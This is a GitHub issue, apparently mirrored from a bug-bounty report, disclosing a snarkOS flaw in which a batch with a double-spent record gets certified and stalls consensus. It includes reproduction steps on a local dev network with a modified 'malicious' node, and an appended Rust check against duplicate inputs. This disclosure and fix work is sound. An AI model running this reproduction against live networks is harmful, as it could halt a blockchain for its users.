An invalid BatchPropose will be certificated and the related BatchCertificate can break the BFT and take down the network #2880

Closed
feezybabee opened this issue Nov 30, 2023 · 2 comments
Labels
bug Incorrect or unexpected behavior

Comments

@feezybabee

https://hackerone.com/reports/2242904

Summary

An invalid BatchPropose can break the BFT and take down the network

Steps To Reproduce:

1. Use the normal snarkOS to start 3 validators

nohup cargo run --release start --validator --dev 0 --nodisplay >> validator_0.log &
nohup cargo run --release start --validator --dev 1 --nodisplay >> validator_1.log &
nohup cargo run --release start --validator --dev 2 --nodisplay >> validator_2.log &

2. Use the modified snarkOS to start 1 malicious node. The malicious node will not check whether the transaction is valid or not, so it will pack a transaction whose input record has already been spent.

Branch: https://github.com/ghostant-1017/snarkOS/tree/test/uncheck

nohup cargo run --release start --validator --dev 3 --nodisplay >> validator_3.log &

3. We create two transactions whose input record is the same one, and we broadcast them to the malicious node.

Like below:


4. Check the logs and we will see: https://cdn.jsdelivr.net/gh/ghostant-1017/img@main/img/image-20231107100525204.png

Proof-of-Concept (PoC)

  1. When the node receives the BatchPropose or BatchCertificate, it will not check whether the transmissions are valid or not.
  2. The node will update_dag -> commit_leader_certificate -> order_dag_with_dfs

https://github.com/AleoHQ/snarkOS/blob/3f845c1205d3e5e1731e33099d88970410e5b003/node/bft/src/bft.rs#L476

  3. Next, consensus_sender.tx_consensus_subdag.send((subdag, transmissions, callback_sender)).await?; will call process_bft_subdag -> try_advance_to_next_block -> check_next_block; since the block is invalid, the check will fail.

https://github.com/AleoHQ/snarkOS/blob/3f845c1205d3e5e1731e33099d88970410e5b003/node/bft/src/bft.rs#L538

  4. The code logic will jump to step 1 again.

Additional Materials

Truncated logs: https://raw.githubusercontent.com/ghostant-1017/logs/master/validator_0_2023_11_07_02_35_00_2023_11_07_02_36_00.log

Impact

An invalid BatchPropose will be certificated and the related BatchCertificate can break the BFT and take down the network

@feezybabee feezybabee added the bug Incorrect or unexpected behavior label Nov 30, 2023
@vicsn
Collaborator

vicsn commented Dec 1, 2023

Note that this attack works when two transactions are sent in different batches. But we should also cover the case where the duplicate inputs are used within the same batch.

@feezybabee
Author

Addressed in this PR: https://github.com/AleoHQ/snarkVM/pull/2229
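
The two cases raised in this thread (an input record spent again in a later batch, and spent twice within one batch), as an added example that is not part of the issue and is not snarkOS or snarkVM code: a Rust model of a check a validator could run on a proposed batch before signing it. `Tx`, `Rejection`, `check_batch`, `commit` and the record names are hypothetical, and the sample data is constructed.

```rust
use std::collections::{HashMap, HashSet};

/// Simplified stand-in for a transaction: only its ID and the IDs of the
/// records it consumes. Hypothetical types, not snarkOS/snarkVM types.
#[derive(Debug, Clone)]
pub struct Tx {
    pub id: &'static str,
    pub input_ids: Vec<&'static str>,
}

#[derive(Debug, PartialEq)]
pub enum Rejection {
    /// Input was consumed by a transaction committed in an earlier batch.
    AlreadySpent { tx: &'static str, input: &'static str },
    /// Input is consumed twice inside the batch being validated.
    DuplicateInBatch { tx: &'static str, first_tx: &'static str, input: &'static str },
}

/// Validate a proposed batch against the committed spent set and against itself.
pub fn check_batch(spent: &HashSet<&'static str>, batch: &[Tx]) -> Result<(), Rejection> {
    // Maps each input seen so far in this batch to the transaction that used it.
    let mut seen: HashMap<&'static str, &'static str> = HashMap::new();
    for tx in batch {
        for &input in &tx.input_ids {
            if spent.contains(input) {
                return Err(Rejection::AlreadySpent { tx: tx.id, input });
            }
            if let Some(&first_tx) = seen.get(input) {
                return Err(Rejection::DuplicateInBatch { tx: tx.id, first_tx, input });
            }
            seen.insert(input, tx.id);
        }
    }
    Ok(())
}

/// Record a batch's inputs as spent once the batch is committed.
pub fn commit(spent: &mut HashSet<&'static str>, batch: &[Tx]) {
    for tx in batch {
        spent.extend(tx.input_ids.iter().copied());
    }
}

fn main() {
    // Constructed sample data: tx_a and tx_b consume the same record.
    let tx_a = Tx { id: "tx_a", input_ids: vec!["record_1"] };
    let tx_b = Tx { id: "tx_b", input_ids: vec!["record_1"] };
    let mut spent = HashSet::new();
    println!("same batch:  {:?}", check_batch(&spent, &[tx_a.clone(), tx_b.clone()]));
    commit(&mut spent, &[tx_a]);
    println!("later batch: {:?}", check_batch(&spent, &[tx_b]));
}
```

Rejecting at proposal time keeps the conflicting transaction out of a certificate, so the failure never reaches the block-advance check described in the PoC steps.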
